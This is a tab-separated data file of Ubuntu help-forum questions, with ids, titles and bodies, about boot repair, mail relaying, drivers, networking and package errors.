340845	grub rescue when trying to fix dualboot with windows 8 , what can i do ?	i formatted the partition containing ubuntu 13.04 running parallel with windows 8 , i then merged the partition disk into another disk and that is where the problem starts . when i restart the computer and i get grub rescue . i searched for solution on net they advised me to repair by booting with windows cd , this resulted in another problem and now it 's saying `` operating system was n't found `` and i can not boot with windows cd . my os is windows 8 . please help me with a solution .
340847	nullmailer gives `` unspecified temporary error '' when trying to send mail using google account	sending mail using nullmailer to a google ( apps ) account results in `` unspecified temporary error '' i use google apps and have two account that i want to use : systemmail @ adomain.se : will be the sender of all mail john.doe @ adomain.se : will be the reciever of all mail how i set it up : service nullmailer stop rm /var/log/syslog /var/log/mail.err /var/log/mail.log as i wanted to discard previous messages when debugging the nullmailer configuration . apt-get install nullmailer edited /etc/nullmailer/adminaddr to contain : ( one line with text and a line break ) systemmail @ adomain.se edited '/etc/nullmailer/remotes ' to contain ( one line with text and a line break ) smtp.gmail.com smtp -- port=587 -- auth-login -- user=systemmail @ adomain.se -- pass=thepassword -- starttls restarted the computer . after the set up i have tried : sending a few mails using : echo `` test 1 '' | mailq -s `` test one '' john.doe @ adomain.se and also using the sendmail front-end : $ sendmail -v john.doe @ adomain.se < < eom > subject : test mail four > the message body > > eom after some attempts to send mail the relevant information in /var/log/syslog , /var/log/mail.err and /var/log/mail.log look like this : $ cat /var/log/mail.err sep 3 14:42:52 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:43:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:44:37 nullmailer [ 1490 ] : last message repeated 3 times sep 3 14:45:37 nullmailer [ 1490 ] : last message repeated 2 times sep 3 14:46:37 nullmailer [ 1490 ] : last message repeated 2 times $ cat /var/log/mail.log sep 3 14:28:17 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:42:52 cow nullmailer [ 1490 ] : trigger pulled . sep 3 14:42:52 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:42:52 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:42:52 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:42:52 cow nullmailer [ 1490 ] : delivery complete , 1 message ( s ) remain . sep 3 14:43:29 cow nullmailer [ 1490 ] : trigger pulled . sep 3 14:43:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:43:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:43:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:43:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:43:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:43:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . sep 3 14:44:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:44:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:44:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:44:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:44:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:44:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . sep 3 14:45:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:45:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:45:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:45:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:45:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:45:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . sep 3 14:46:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:46:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:46:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:46:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:46:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:46:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . $ grep nullmailer /var/log/syslog sep 3 14:28:17 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:42:52 cow nullmailer [ 1490 ] : trigger pulled . sep 3 14:42:52 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:42:52 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:42:52 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:42:52 cow nullmailer [ 1490 ] : delivery complete , 1 message ( s ) remain . sep 3 14:43:29 cow nullmailer [ 1490 ] : trigger pulled . sep 3 14:43:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:43:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:43:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:43:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:43:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:43:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . sep 3 14:44:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:44:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:44:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:44:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:44:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:44:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . sep 3 14:45:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:45:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:45:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:45:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:45:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:45:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . sep 3 14:46:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:46:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:46:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:46:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:46:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:46:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . sep 3 14:47:29 cow nullmailer [ 1490 ] : rescanning queue . sep 3 14:47:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212209.2284 sep 3 14:47:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:47:29 cow nullmailer [ 1490 ] : starting delivery : protocol : smtp host : smtp.gmail.com file : 1378212171.2280 sep 3 14:47:29 cow nullmailer [ 1490 ] : sending failed : unspecified temporary error sep 3 14:47:29 cow nullmailer [ 1490 ] : delivery complete , 2 message ( s ) remain . the contents of /var/spool/nullmailer/queue/ and /var/spool/nullmailer/tmp/ : $ ls /var/spool/nullmailer/queue/ 1378212171.2280 1378212209.2284 $ ls /var/spool/nullmailer/tmp/ 31464 31468 31672 questions have i made any obvious error in the configuration ? what could the `` unspecified temporary error '' be ? where does the mail sending process go wrong ? how should i proceed when trying to debug this ?
340851	bash history for root ?	after installing 'ubuntu-desktop ' on 12.04-lts-server , the arrow keys work correctly for history navigation when the user is not root . however , for the root user , the arrow keys ( for example , the up-arrow ) do not work when using a shell with the gnome desktop . if the root user is connected via ssh , the arrow keys work . suggestions ? thanks !
340852	problem reading files in ntfs external hd from windows xp after installing ubuntu	i am one of the guys that always used windows eventhough i hate it . a month ago i wiped out windows xp from my pc and installed ubuntu . i have an external hd and a second laptop which is left with windows xp . after the ubuntu instalation i have used from pc without a problem the external hd and also added some files to it . from that point the pc sees everything but the laptop with the xp recognizes the external hd without seeing any files in it , only some directories with long arithmetic names and no real content inside . please help , it is/was my backup drive ! thank you very much
340853	hp laser jet pro p1102 shared from winows 7 pro	i have trouble with this printer shared from windows 7 pro . win machine ip : 10.0.0.120 printer uri smb : //10.0.0.120/hp1102 whenever i try to print over network i got this error : bezczynna - /usr/lib/cups/filter/hpcups failed . i tried installing hplip from here : http : //hplipopensource.com/hplip-web/models/laserjet/hp_laserjet_professional_p1102.html but it seems to doesnt work . hp-setup also does n't support samba .
340855	how to show the numpad automatically when the textfield is loaded ?	i 'm making an app with the ubuntu sdk where a user has to enter a number as fast as possible . i have a textfield in a page , where he has to enter the number : textfield { id : inputquestion width : 100 height : 50 errorhighlight : true validator : intvalidator { } text : ' ? ' } i have two questions about that : how can i make it so the textfield is automatically selected when the page opens ? ( the cursor is in the textbox ) how can i make it so the numpad of the smartphone/tablet automatically opens when the page opens ?
340864	poor chrome performance in minimal xsession	i have ubuntu 12.04 installed , and i 'm trying to create a minimal chrome browser only setup , and have tried adding our script that runs google-chrome to .xinitrc and running startx ( this answer : http : //askubuntu.com/a/141169/189765 ) i 'm experiencing significantly worse performance in chrome ( framerates on animations , etc ) than when i run the browser from within gnome in ubuntu 12.04 . i 'm trying to understand the difference in performance . is gnome allowing chrome to use the video card / gpu in some way , and we 're losing this benefit in the standalone xsession ?
340871	how do i install ubuntu 13.04 on my laptop with 3 primary and 1 extended partition existing already ?	device boot start end blocks id system /dev/sdb1 1985 23975935 11986975+ f w95 ext 'd ( lba ) /dev/sdb2 * 23975936 24180734 102399+ 7 hpfs/ntfs/exfat /dev/sdb3 24180736 233895934 104857599+ 7 hpfs/ntfs/exfat /dev/sdb4 233895936 1250263039 508183552 7 hpfs/ntfs/exfat /dev/sdb5 2048 23975935 11986944 1 fat12 the extended partition contains some recovery tools . partition sdb3 has windows 8 installed on it . partition sdb4 has some random data ( videos , music etc ) . is it possible to install ubuntu on sdb4 such that the data on it can be accessed on both windows as well as linux ? or any other way without deleting the recovery partition ? thanks !
340874	lts enablement stacks - should i use quantal , raring or saucy ?	i installed kubuntu 12.04 from a beta iso and i have been updating it ever since then . however , i want to opt into the hardware enablement stack for precise now . i have two questions : first , how do i decide between versions ? for example , betwen quantal , raring or saucy would i simply pick the latest ? ( and is saucy available for this purpose yet ? ) sudo apt-get install linux-generic-lts-raring xserver-xorg-lts-raring or sudo apt-get install linux-generic-lts-saucy xserver-xorg-lts-saucy second , if i opt into the hardware enablement stack using the raring release , will there be any difficulties or challenges moving to the saucy or subsequent releases later ? and what would i have to do at that time ?
340877	wubi took up all of my disk space on win 7	i tried to create a live 13.04 usb using a 1tb external hard drive and it would n't boot on my machine . after that , i booted into windows and tried to run wubi from the hard drive and i selected the `` help me boot from cd '' option . when it was at the stage of copying the files and it copied way more than it should have and now i only have about 200mb left on windows . can anyone please tell me if this is reversible ? all help appreciated , thanks in advance .
340880	what does the takeover of nokia mean for the ubuntu sdk ?	well , the title says it all : what does the takeover of nokia by microsoft mean for the ubuntu sdk , as the ubuntu sdk relies on qt which is ( was ? ) a nokia project ?
340881	dns server or nameserver	edit connection mobile broadband : select network name : edit ip4 settings : under methods : automatic ppp and automatic ppp address only changed dns server to : 198.153.192.40 and search domains to : 198.153.194.40 yet the output of $ cat /etc/resolv.conf : is dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search 198.153.194.40 it is the same output on wireless network also . is this normal for nameserver ? out put of cat /etc/issue : distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise ubuntu 12.04.3 lts \n \l am having many intrusions to my pc and wonder if that is a contribute factor . although , dns test like ( www.dnsleaktest.com ) does show what was implemented at `` edit connections '' that is the ip address ' of the public dns added . ubuntu network tools ( 3.2.0 ) shows : devices : network devices : loopback interface ( lo ) protocol : ipv6 ip address : : :1 netmask : 128 scope : host protocol : ipv4 ip address : 127.0.0.1 netmask : 255.0.0.0 scope :
340886	which version off ubuntu should i download	i have a dell inspiron 910 netbook and it has only a small hard disk , with only about 4.5gib spare . my copy of windows is not good and i would like the option to boot into either ubuntu or windows 7 . when i go to download ubuntu it says 8gib , is there a smaller version which i could install on my computer to boot up with an option other than windows ?
340887	how do i know what files are executed when i open an application ?	i want to know what happens behind the screen when i open some application . for example , when i open firefox , i want to know which files are read and which are executed . is there any way to do this . even opening firefox from terminal does n't show any information . os : ubuntu 12.04
340893	how ubuntu can resolve the 'localhost ' address without any webserver installed ?	i decided to install a lamp stack and follow this nice tutorial . i removed everything apache2 , mysql , php related using apt-get and the -- purge option ( as the tutorial said ) . a reboot later i have no more apache2 service or daemon on my machine : julien @ shittylaptop : ~ $ sudo service apache2 stop apache2 : unrecognized service and julien @ shittylaptop : /etc/init.d $ ls|grep apa julien @ shittylaptop : /etc/init.d $ cool ... except : now , if i go to h**p : //localhost , it still displays the `` it works '' page . if i modify the /var/www/index.html file , firefox displays the change i made ! so , ok sounds somehow logical since i do n't need a webserver to display a simple html file in ff but : 1 ) how does ubuntu know which folder to point to when i enter the localhost address in my browser ? 2 ) is it a normal behaviour and could i go on with actually installing a lamp stack ? or do you think something is corrupted on this install ?
340894	backing up mysql to ubutuone	i use mysql as a backend for my xbmc , i also have a ubuntu one account . what is the best way to regularly back up the database to ubuntu one ?
340897	bash aliases - how do i run a file in a different folder without losing my current location ?	i have a nice little bash alias in my .bashrc folder that allows me to start tomcat running without having to cd into the folder first , e.g . alias starttomcat= '' cd ~/apache-tomcat-7.0.34/bin/ & & ./startup.sh '' however when i run starttomcatin a terminal , i 'm booted out of the folder i started in , and now my terminal 's residing in ~/apache-tomcat-7.0.34/bin/ . this is expected behaviour , of course , but what i 'd like to do is run the command without winding up in a different folder . can i either save the original location , then return to it in my .bashrc file , or alternatively run startup.sh without cding out of the original folder ? thanks ! !
340899	mac book pro 6,2 nvidia graphics & suspend do n't work	as soon as i suspend my mbp the led starts pulsing after a while but by opening the lid xserver hangs , i get a black screen and am presented with the login screen after 2 minutes . logging in results in the same procedure ( black screen - > wait - > login - > ... ) i somewhere read that the nouveau driver is causing this so i tried to install the nvidia driver ( 304 ) on my ubuntu system ( 13.04 ) from console because it was n't listed in the additional drivers tab . the driver causes the monitor to be shut off ( black and no backlight ) after the kernel started up ( logging in and shutting down from terminal works ) . after 'apt-get purge nvidia-* ' everything is back to normal ( monitor works , suspend does n't ) btw : i have an nvidia gt330m with a hi-res 1680*1050 display is there anything i can do about it to get suspend to work and even better the nvidia driver ?
340903	processor temperature when just browsing the web is 55-60 c	i 'm running ubuntu 12.04 on my laptop . it has an intel® core™ i7-3537u cpu @ 2.00ghz × 4 , 8 gb ram , and an amd radeon hd 8730m it also has a intel hd 4000 but i 'm using amd i have nothing else open than chromium , a terminal , and konversation and cpu temp is 55-60 c or even more sometimes . when i run a 3d game it goes up to 80-85 and again sometimes even more . in windows 8 tho ... temp is at 54 c most of the time . is this normal ? if not , is there something i can do about it or this is strictly hardware related problem ? ( if it 's a problem ) . help ?
340908	gparted can not identify swap partition on ubuntu 13.04	i had a major system crash , after which i reinstalled ubuntu 13.04 . the problem was that i was n't sure about creating a partition for swap using gparted because from what the online tutorials seemed to indicate , creation of a new partition would leave the original drive marked as `` unallocated '' with the remainder of free space ( i might be wrong though , but i was hesitant ) . anyway , i could n't boot either windows or ubuntu after i created a separate 4gb partition from my c drive on windows . i ran a boot repair and fixed my windows . now the problem is that my system can detect swap at start up unlike here : safe to create a swap partition using gparted ? , but gparted shows it to be an `` unknown '' partition . is there a way this can be fixed ? would it be okay to just right click and set it as swap , or are there some other changes to be made ?
340909	can i make profitable app for ubuntu touch ?	i would like to ask you guys , if there would be some sort of app policy regarding the ubuntu touch . just as in android , and ios , the developers could earn a reasonable amount of money , by making their applications paid for , or by placing adds in the app . will this kind of things available in the ubuntu touch , or the app ecosystem will be only allowing free open source applications ? ( i am not talking about the big paid for projects made by the big guns , just the one men projects )
340910	how to recover files from a partition that was previosuly ntfs under wndows but after ubuntu installation had been converted to ext4 ?	i had accidentally installed ubuntu 13.04 on windows 8 while trying to dual boot . i had a single partition ( 973gb ) which had windows with ntfs filesystem . but by the accidental install of ubuntu the filesystem had changed to ext4 . when i tried testdisk , it showed me three partitions : p efi system ( with very less data ) p ms data ( the large disk of around 950gb . i think this partition has all the data ) p linux swap ( same size as my ram ) now when i tried searching , it showed that the partition ms data can not be recovered . i dont need the partition or the windows 8 back . i only need some of my important files that got deleted . can i recover these files ? please help .
340911	can not access windows installed drive in ubuntu	i have dual boot of windows 8 and ubuntu 12.04 lts . in ubuntu i can access all drives other than c drive in which windows in installed . for that drive it shows the error that can not open as os is hibernated even though i shutdown windows . why so ?
340917	how to create bootable usb for ubuntu 12.04.3 ?	i googled a lot throughout..but unable to find a software for making bootable usb pendrive of ubuntu 12.04.3 . all the programs available right now supports ubuntu 12.04.2 . what to do ? ? ?
340919	why this upstart job is preventing lightdm from shutdown or restart my notebook ?	in order to have a permanet ssh tunnel running i set up the following upstart job in /etc/init/ssh-tunnel.conf : # ssh tunnel - simple personal ssh tunnel description `` simple personal ssh tunnel '' author `` my name < my email > '' start on runlevel [ 2345 ] stop on runlevel [ 01s6 ] respawn respawn limit 5 60 # start the process exec ssh -cnd port user @ address -i my_key -o batchmode=yes when the job is running i am not able anymore to shutdown or reboot from lightdm . than you in advance for your help .
340924	how to install viber in ubuntu ?	is it possible to install viber voip client on ubuntu ? so that i can call people through viber from my pc .
340927	can not install any application in ubuntu 12.04	i have proxy controlled internet . though i can access internet in firefox in ubuntu after addinf proxy settings , whenever i try to update something in ubuntu through terminal it shows network error . also i tried installing chrome and also flash plugin for firefox , but these shows errors and i cant even update anything .
340928	app should be startable by its name in the command line	i already managed to create a .desktop file , moved it to /usr/share/applications , and can start my app from the dash where the icon appears . the app is started by the command `` python3 /path/to/script '' still . i thought now as i have the starter in the applications folder it would be sufficient to type its name into the command line ( alt+f2 ) and it would start , but it says the command is unknown . where in the system do i have to place a file to let the system know that the app-name is a command ? just like typing `` firefox '' and firefox starts ...
340930	my computer ca n't boot from ubuntu live cds , how can i install ?	so , right now i have ubuntu 7.04 , and i want to install 12.04 lts or 13.04 , but my computer ca n't boot the live cd of both of them , but can boot cd of ubuntu 7.04 or windows 7 ultimate . i think it can be hardware problem because i have very old pc , but i 'm not sure . i had ubuntu 13.04 installed , but after installation it have n't booted ( i had windows xp installed before ) and after that the cd of 12.04 or 13.04 could not boot anymore . any suggestions what should i do to boot live cd ? p.s . i ca n't boot linux mint too and do n't have internet connection on that pc .
340931	system preferences closes when i click on apparence	if i open my system preferences , anything goes smoothly and good . but when i click on apparence , the system preferences close and a window will pop up saying that `` an intern fail appeared '' . i 'm using a 12.04 ubuntu 32 bit lts version
340932	how ubuntu satanic edition is different from regular ubuntu ?	i 'm using ubuntu 12.04 precise , and recently installed ubuntu-satanic-edition . here all i could find different is couple of themes and dozen of wallpapers ? what something else there in it that i missed to notice ? there has to be something important , special - what makes it possessed by satans ? indeed , 't is an open-end question , but before it will be closed , i 'm expecting some insight , at least in comment ?
340937	virtmanager 0.95 or 0.10 on ubuntu and `` can not import name gtkvnc ''	anybody knows about this startup error with virtmanager 0.9.5 or 0.10.0 on ubuntu ? `` can not import name gtkvnc '' how to fix ? what is the cause ?
340940	installing pylint for python3 on ubuntu	my understanding is that the latest release of pylint ( 1.0.0 at the time of this writing ) has support for python 3 , but i ca n't get it to work on 64-bit ubuntu 13.04 with python 3.3 . i followed the installation instructions on this this site , and pylint 1.0.0 seems to be installed successfully ( pylint -- version returns pylint 1.0.0 ) , and works with python 2.7 code , but it reports a syntax error when it sees nonlocal statements and such . what gives ? are there special installation instructions for pylint on ubuntu ? thanks in advance for any help !
340942	skype , green screen , no microphone	i have issues with skype using my brand new system 76 galago ultrapro , running ubuntu 13.04 . i installed skype through ubuntu software centre ( after allowing canonical partner stuff ) , but it wo n't work , the video is a green screen , and it wo n't connect to the microphone . the webcam works when using cheese , and the microphone appears to work in general ( it shows sound levels when i go to the input tab under the sound settings ) . i tried to fix the green screen issue using this command : $ echo -e ' # ! bin/bash n ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype ' | sudo tee /usr/local/bin/skype sudo chmod a+x /usr/local/bin/skype as suggested here : http : //debianhelp.wordpress.com/2012/09/28/to-do-list-after-installing-ubuntu-13-04-aka-raring-ringtail-operating-system/ but no luck . any ideas ? i have also asked this question to the system 76 tech support folk .
340948	slideshow application able to play ( soundless ) video as another picture in a slideshow	i want to show a `` little '' slideshow of a folder containing pictures and a few videos ( .mov format containing no sound ) . unfortunately i could n't find a fullscreen slideshow creator that has this capability . does anyone know a application that is able to do what i want ?
340952	mask vs. mode - permissions	in simple form the what is the difference between `` mask '' and `` mode '' ? from what i understand is if a file has a mask of 0755 the mode of the file would be 7022 correct ? it is basically inverted numbers ?
340957	how to rotate desktop background ?	how to rotate desktop background image in ubuntu ?
340962	problem with nautilus in xfce ( xubuntu 13.04 )	i have installed nautilus in xubuntu , the file manager works great , but the desktop manager does n't starts ( `` nautilus -n '' ) even if i have closed the process xfdesktop in the session , anyone know how to force start nautilus as desktop manager ?
340965	how do i install ubuntu server ( step-by-step )	i 'd like to install ubuntu server on my machine , is there a step-by-step instructions on how to accomplish that or a guide that will just go through the basic steps of installing ubuntu server from beginning to end . instructions originally for 13.04 .
340969	networking problem with ubuntu as guest in vmware workstation on windows 7 64bit	i 've the following configuration : a . physical machine : windows 7 64bit with vmware workstation 8 with a physical network adapter with this ip configuration : ip 192.168.1.101 subetnet mask 255.255.255.0 gateway 192.168.1.254 and a virtual network adapter ( vmnet8 ) with this configuration : ip 10.10.0.18 subnet ip : 10.10.0.0 subnet mask : 255.255.255.0 b . virtual machine : ubuntu 12.04 server ( running in vmware workstation 8 ) with the following ip configuration ( in /etc/network/interfaces ) : auto eth0 iface eth0 inet static address 10.10.0.1 netmask 255.255.255.0 gateway 10.10.0.18 with this routing table ( route -n ) : destination gateway genmask flags metric ref use iface 0.0.0.0 10.10.0.18 0.0.0.0 ug 100 0 0 eth0 10.10.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.1.0 10.10.0.18 255.255.255.0 ug 0 0 0 eth0 the problem is that the virtual machine is not accessing the internet nor pinging the physical machine , in particular : ( from the physical machine ) internet is accessibile ping 10.10.0.18 - > is working ping 10.10.0.1 - > is working ( from the virtual machine ) internet is not accessible ping 10.10.0.1 - > is working ( it 's itself ) ping 10.10.0.18 - > is working ping 192.168.1.101 - > is not working ping 192.168.1.254 - > is not working as well i 've tried this answer ( configuring ubuntu vmware guest nat ) but it 's not working . any suggestion will be very appreciated .
340970	e : sub-process /usr/bin/dpkg returned an error code ( 2 ) - every time i use apt-get install	i am running 64-bit ubuntu 13.04 . i tried to install cairo-dock as follows : sudo add-apt-repository ppa : cairo-dock-team/ppa -- went well , no errors . sudo apt-get update -- went well , no errors . sudo apt-get install cairo-dock cairo-dock-plug-ins -- error this is the console output : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : cairo-dock-core cairo-dock-data cairo-dock-plug-ins-data cairo-dock-plug-ins-dbus-interface-python cairo-dock-plug-ins-integration compiz-plugins curl libetpan15 libgldi3 suggested packages : cairo-dock-plug-ins-dbus-interface-mono cairo-dock-plug-ins-dbus-interface-ruby cairo-dock-plug-ins-dbus-interface-vala gnote the following new packages will be installed : cairo-dock cairo-dock-core cairo-dock-data cairo-dock-plug-ins cairo-dock-plug-ins-data cairo-dock-plug-ins-dbus-interface-python cairo-dock-plug-ins-integration compiz-plugins curl libetpan15 libgldi3 0 upgraded , 11 newly installed , 0 to remove and 0 not upgraded . need to get 10.3 mb of archives . after this operation , 26.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 **link** raring/universe cairo-dock-data all 3.2.1-0ubuntu1 [ 468 kb ] get:2 **link** raring/universe libgldi3 amd64 3.2.1-0ubuntu1 [ 352 kb ] get:3 **link** raring/universe cairo-dock-core amd64 3.2.1-0ubuntu1 [ 1,125 kb ] get:4 **link** raring/universe cairo-dock-plug-ins-data all 3.2.1-0ubuntu1 [ 4,190 kb ] get:5 **link** raring-updates/main curl amd64 7.29.0-1ubuntu3.1 [ 149 kb ] get:6 **link** raring/universe libetpan15 amd64 1.0-5 [ 286 kb ] get:7 **link** raring/universe cairo-dock-plug-ins amd64 3.2.1-0ubuntu1 [ 871 kb ] get:8 **link** raring/universe cairo-dock-plug-ins-integration amd64 3.2.1-0ubuntu1 [ 59.9 kb ] get:9 **link** raring/universe cairo-dock-plug-ins-dbus-interface-python all 3.2.1-0ubuntu1 [ 16.0 kb ] get:10 **link** raring/universe cairo-dock all 3.2.1-0ubuntu1 [ 8,738 b ] get:11 **link** raring-updates/universe compiz-plugins amd64 1:0.9.9~daily13.06.19~13.04-0ubuntu1 [ 2,764 kb ] fetched 10.3 mb in 2min 1s ( 84.8 kb/s ) selecting previously unselected package cairo-dock-data . **dpkg : unrecoverable fatal error , aborting : reading files list for package 'linux-headers-3.8.0-19 ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) ** the install gets stuck on the dpkg line . this error occurs every time i try to install a program using apt-get install .
340973	ca n't change resolution	when i get to the log in screen everything is fine but when i log in the resolution completely changes to something else . i tried going into display to fix it but it says that my resolution is at the correct amount and when i try other resolutions they are even bigger . i 'm using nvidia driver 304.88 and i 'm assuming that my graphics card is n't fried because i can do every thing i used to at the same speed .
340981	purple and green screen when watching video on youtube ?	just installed ubuntu 12.04 lts onto my desktop . everything works great but when i go to watch a video on youtube the video appears only in green and purple ? sound is coming through just fine and video is playing . the video is just hard to see . i am sure its something simple but does anyone have ideas ? thanks .
340985	force index page on lan connection	i run 3 servers on a local network . i 'd like to force an index.html/php to pop on to anyone joining the lan . i see many routers these days pop up a guest login page and think somehow i can point the router to my index.html/php so anyone joining the network is automatically shown the index without having to put an address in their browser . tia
340986	sound settings gui not working	i have a problem , im using 12.10 ubuntu . recent i sound settings gui working . now it not working . how to get master gui working ? my sound working but audio ( master ) slise in mute permanently also audio settings are empty . however in flash , spotify etc slides working . also mute button is removed . my alsamixer working . my hwinfo is this . hwinfo -- sound 24 : pci 709.0 : 0401 multimedia audio controller [ created at pci.318 ] udi : /org/freedesktop/hal/devices/pci_13f6_111 unique id : gkx6.ft7wcdwsusc parent id : 6nw+.fukesqtkov4 sysfs id : /devices/pci0000:00/0000:00:1e.0/0000:07:09.0 sysfs busid : 0000:07:09.0 hardware class : sound model : `` terratec aureon 5.1 '' vendor : pci 0x13f6 `` c-media electronics inc '' device : pci 0x0111 `` cm8738 '' subvendor : pci 0x153b `` terratec electronic gmbh '' subdevice : pci 0x1144 `` aureon 5.1 '' revision : 0x10 driver : `` snd_cmipci '' driver modules : `` snd_cmipci '' i/o ports : 0x1000-0x1fff ( rw ) irq : 21 ( 336 events ) module alias : `` pci : v000013f6d00000111sv0000153bsd00001144bc04sc01i00 '' driver info # 0 : driver status : snd_cmipci is active driver activation cmd : `` modprobe snd_cmipci '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 20 ( pci bridge )
340995	ubuntu desktop on arm device tablet gt-p3100 galaxy 7	i 've read some post about installing ubuntu on arm device , but all refer to the ubuntu touch developer preview ; is there any possibilities to install a desktop version `` not touch '' to my galaxy tab 2 7 '' , i want ot use it with a keyboard and mouse , i like the tablet because he have n't a fan rumours : - ) , i do n't want to install ubuntu as vnc controlled but a real installation and in a dual boot with my actual cyanogenmod 10. all i need is a mouse and keyboard controlled os with wifi and bluetooth gnome classic or gnome shell as a desktop enviroinment ... thunderbird.firefox and a shell
340997	setting up virtualmin with php 5.4 or 5.5	i 've tried various ways of getting a later version of php than 5.3 with virtualmin . each time breaking the server . i 've tried adding ppa : ondrej/php5 and installing 5.5 both before and after installing virtualmin . i must be missing something . virtualmin/webmin appear to have no information on this topic . ps : using ubuntu server 12.04 lts
